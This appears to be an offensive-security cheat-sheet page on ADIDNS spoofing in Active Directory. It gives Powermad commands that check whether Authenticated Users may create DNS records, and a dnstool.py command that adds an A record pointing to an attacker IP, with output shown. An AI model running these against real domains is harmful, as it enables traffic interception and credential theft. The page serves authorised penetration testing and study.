ADIDNS Spoofing

Powermad.ps1: CreateChild permission

PS > $User = 'domain.local\user';$Pass = ConvertTo-SecureString 'password' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)

PS > Get-ADIDNSPermission -Credential $Cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal             : NT AUTHORITY\Authenticated Users
IdentityReference     : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

dnstool.py

$ python3 dnstool.py -u domain.local\\username -p password --action add --record recordname --data ATTACK_IP --type A domain.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

HTB: Intelligence0xdf hacks stuff

ADIDNS poisoning | The Hacker Recipes

HTB{ Hades }snovvcrash@gh-pages:~$ _

PreviousLLMNR NBT-NS Poisoning NextMicrosoft Office & Outlook

Last updated 1 month ago